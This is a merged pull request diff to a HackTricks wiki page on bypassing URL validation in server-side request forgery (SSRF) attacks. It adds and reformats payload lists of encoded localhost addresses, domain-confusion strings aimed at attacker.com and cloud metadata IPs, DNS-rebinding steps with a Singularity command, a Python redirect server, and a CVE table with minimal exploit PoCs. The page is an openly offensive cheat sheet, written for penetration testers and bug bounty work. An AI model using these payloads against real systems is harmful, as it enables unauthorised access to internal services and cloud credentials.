Merge pull request #1939 from HackTricks-wiki/research_update_src_pentesting-web_ssrf-server-side-request-forgery_url-format-bypass_20260224_024016

Research Update Enhanced src/pentesting-web/ssrf-server-side...

Author: carlospolop

src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

@@ -4,9 +4,12 @@
 
 ### Localhost
 
+<details>
+<summary>Localhost payloads</summary>
+
 ```bash
 # Localhost
-0 # Yes, just 0 is localhost in Linuc
+0 # Yes, just 0 is localhost in Linux
 http://127.0.0.1:80
 http://127.0.0.1:443
 http://127.0.0.1:22
@@ -23,7 +26,7 @@ http://[0000::1]:80/
 http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
 http://①②⑦.⓪.⓪.⓪
 
-# CDIR bypass
+# CIDR bypass
 http://127.127.127.127
 http://127.0.1.3
 http://127.0.0.0
@@ -50,8 +53,8 @@ http://0xc0a80014/ = http://192.168.0.20
 0x0000007f.0x00000000.0x00000000.0x00000001
 
 # Mixed encodings bypass
-169.254.43518 -> Partial Decimal (Class B) format combines the third and fourth parts of the IP address into a decimal number
-0xA9.254.0251.0376 -> hexadecimal, decimal and octal
+169.254.43518 -> Partial Decimal (Class B) format combines the third and fourth parts of the IP address into a decimal number
+0xA9.254.0251.0376 -> hexadecimal, decimal and octal
 
 # Add 0s bypass
 127.000000000000.1
@@ -78,19 +81,24 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
 spoofed.burpcollaborator.net = 127.0.0.1
 ```
 
+</details>
+
 ![](<../../images/image (776).png>)
 
 The **Burp extension** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implements IP formatting bypasses.
 
 ### Domain Parser
 
+<details>
+<summary>Domain parser bypasses</summary>
+
 ```bash
 https:attacker.com
 https:/attacker.com
 http:/\/\attacker.com
 https:/\attacker.com
 //attacker.com
-\/\/attacker.com/
+\\/\/attacker.com/
 /\/attacker.com/
 /attacker.com
 %0D%0A/attacker.com
@@ -102,8 +110,11 @@ attacker%00.com
 attacker%E3%80%82com
 attacker。com
 ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
+# double encoded fragment to bypass split("#"): attacker.com%2523@victim
 ```
 
+</details>
+
 ```
 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
 ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
@@ -115,6 +126,9 @@ attacker。com
 
 ### Domain Confusion
 
+<details>
+<summary>Domain confusion payloads</summary>
+
 ```bash
 # Try also to change attacker.com for 127.0.0.1 to try to access localhost
 # Try replacing https by http
@@ -142,21 +156,25 @@ https://attacker.com:\@@{domain}
 https://attacker.com#\@{domain}
 https://attacker.com\anything@{domain}/
 https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
+# colon + backslash confusion (CVE-2025-0454 in autogpt)
+http://localhost:\@google.com/../
 
 # On each IP position try to put 1 attackers domain and the others the victim domain
 http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
 
-#Parameter pollution
+# Parameter pollution
 next={domain}&next=attacker.com
 ```
 
+</details>
+
 ### Paths and Extensions Bypass
 
 If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses:
 
 ```
-https://metadata/vulerable/path#/expected/path
-https://metadata/vulerable/path#.extension
+https://metadata/vulnerable/path#/expected/path
+https://metadata/vulnerable/path#.extension
 https://metadata/expected/path/..%2f..%2f/vulnerable/path
 ```
 
@@ -179,6 +197,9 @@ It might be possible that the server is **filtering the original request** of a
 For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\
 [Check out this report.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
 
+<details>
+<summary>Simple redirector for SSRF testing</summary>
+
 ```python
 #!/usr/bin/env python3
 
@@ -200,25 +221,37 @@ class Redirect(BaseHTTPRequestHandler):
 HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
 ```
 
-## Explained Tricks
+</details>
 
-### Blackslash-trick
+### DNS rebinding bypass (2025+)
+
+Even when an SSRF filter performs a **single DNS resolution before sending the HTTP request**, you can still reach internal hosts by rebinding the domain between lookup and connection:
+
+1. Point `victim.example.com` to a public IP so it passes the allow‑list / CIDR check.
+2. Serve a very low TTL (or use an authoritative server you control) and rebind the domain to `127.0.0.1` or `169.254.169.254` just before the real request is made.
+3. Tools like **Singularity** (`nccgroup/singularity`) automate the authoritative DNS + HTTP server and include ready‑made payloads. Example launch: `python3 singularity.py --lhost <your_ip> --rhost 127.0.0.1 --domain rebinder.test --http-port 8080`.
+
+This technique was used in 2025 to bypass the BentoML "safe URL" patch and similar single‑resolve SSRF filters.
+
+### Explained Tricks
+
+#### Backslash-trick
 
 The _backslash-trick_ exploits a difference between the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). While RFC3986 is a general framework for URIs, WHATWG is specific to web URLs and is adopted by modern browsers. The key distinction lies in the WHATWG standard's recognition of the backslash (`\`) as equivalent to the forward slash (`/`), impacting how URLs are parsed, specifically marking the transition from the hostname to the path in a URL.
 
 ![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg)
 
-### Left square bracket
+#### Left square bracket
 
 The “left square bracket” character `[` in the userinfo segment can cause Spring’s UriComponentsBuilder to return a hostname value that differs from browsers: [https://example.com\[@attacker.com](https://portswigger.net/url-cheat-sheet#id=1da2f627d702248b9e61cc23912d2c729e52f878)
 
-### Other Confusions
+#### Other Confusions
 
 ![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../images/image (600).png>)
 
 image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
 
-### IPv6 Zone Identifier (%25) Trick
+#### IPv6 Zone Identifier (%25) Trick
 
 Modern URL parsers that support RFC 6874 allow *link-local* IPv6 addresses to include a **zone identifier** after a percent sign. Some security filters are not aware of this syntax and will only strip square-bracketed IPv6 literals, letting the following payload reach an internal interface:
 
@@ -229,21 +262,23 @@ http://[fe80::a9ff:fe00:1%25en0]/ # Another example (macOS style)
 
 If the target application validates that the host is *not* `fe80::1` but stops parsing at the `%`, it may incorrectly treat the request as external. Always normalise the address **before** any security decision or strip the optional zone id entirely.
 
-### Recent Library Parsing CVEs (2022–2025)
+### Recent Library Parsing CVEs (2022–2026)
 
 A number of mainstream frameworks have suffered from hostname-mismatch issues that can be exploited for SSRF once URL validation has been bypassed with the tricks listed above:
 
 | Year | CVE | Component | Bug synopsis | Minimal PoC |
 |------|-----|-----------|--------------|-------------|
-| 2024 | CVE-2024-22243 / ‑22262 | Spring `UriComponentsBuilder` | `[` is not allowed in the *userinfo* section, so `https://example.com\[@internal` is parsed as host `example.com` by Spring but as `internal` by browsers, enabling open-redirect & SSRF when host allow-lists are used. Upgrade to Spring 5.3.34 / 6.0.19 / 6.1.6+.  |
-| 2023 | CVE-2023-27592 | **urllib3** <1.26.15 | Backslash confusion allowed `http://example.com\\@169.254.169.254/` to bypass host filters that split on `@`. |
-| 2022 | CVE-2022-3602 | OpenSSL | Hostname verification skipped when the name is suffixed with a `.` (dotless domain confusion). |
-
-When you depend on third-party URL parsers, **compare the canonicalised host returned by the library you trust with the raw string supplied by the user** to detect these classes of issues.
+| 2025 | CVE-2025-0454 | Python `requests` + `urllib.parse` (autogpt) | Parsing mismatch on `http://localhost:\\@google.com/../` lets allow‑lists think host is `google.com` while the request hits `localhost`. | `requests.get("http://localhost:\\@google.com/../")` |
+| 2025 | CVE-2025-2691 | Node package `nossrf` | Library meant to block SSRF only checks the original hostname, not the **resolved IP**, allowing hostnames that resolve to private ranges. | `curl "http://trusted.example" --resolve trusted.example:80:127.0.0.1` |
+| 2024 | CVE-2024-29415 | Node `ip` package | `isPublic()` misclassified dotted‑octal / short‑form localhost (e.g., `0127.0.0.1`, `127.1`) as public, letting filters accept internal targets. | `ip.isPublic('0127.0.0.1')` returns true on vulnerable versions |
+| 2024 | CVE-2024-3095 | Langchain WebResearchRetriever | No host filtering; GET requests could reach IMDS/localhost from AI agents. | User‑controlled URL inside `WebResearchRetriever` |
+| 2024 | CVE-2024-22243 / ‑22262 | Spring `UriComponentsBuilder` | `[` in userinfo parsed differently by Spring vs browsers, allowing allow‑list bypass. | `https://example.com\[@internal` |
+| 2023 | CVE-2023-27592 | **urllib3** <1.26.15 | Backslash confusion allowed `http://example.com\\@169.254.169.254/` to bypass host filters that split on `@`. | — |
+| 2022 | CVE-2022-3602 | OpenSSL | Hostname verification skipped when the name is suffixed with a `.` (dotless domain confusion). | — |
 
 ### Payload-generation helpers (2024+)
 
-Creating large custom word-lists by hand is cumbersome.  The open-source tool **SSRF-PayloadMaker** (Python 3) can now generate *80 k+* host-mangling combinations automatically, including mixed encodings, forced-HTTP downgrade and backslash variants:
+Creating large custom word-lists by hand is cumbersome. The open-source tool **SSRF-PayloadMaker** (Python 3) can now generate *80 k+* host-mangling combinations automatically, including mixed encodings, forced-HTTP downgrade and backslash variants:
 
 ```bash
 # Generate every known bypass that transforms the allowed host example.com to attacker.com
@@ -259,5 +294,7 @@ The resulting list can be fed directly into Burp Intruder or `ffuf`.
 - [https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet](https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet)
 - [https://nvd.nist.gov/vuln/detail/CVE-2024-22243](https://nvd.nist.gov/vuln/detail/CVE-2024-22243)
 - [https://github.com/hsynuzm/SSRF-PayloadMaker](https://github.com/hsynuzm/SSRF-PayloadMaker)
+- [https://medium.com/%40narendarlb123/1-cve-2025-0454-autogpt-ssrf-via-url-parsing-confusion-921d66fafcbe](https://medium.com/%40narendarlb123/1-cve-2025-0454-autogpt-ssrf-via-url-parsing-confusion-921d66fafcbe)
+- [https://www.tenable.com/blog/how-tenable-bypassed-patch-for-bentoml-ssrf-vulnerability-CVE-2025-54381](https://www.tenable.com/blog/how-tenable-bypassed-patch-for-bentoml-ssrf-vulnerability-CVE-2025-54381)
 
 {{#include ../../banners/hacktricks-training.md}}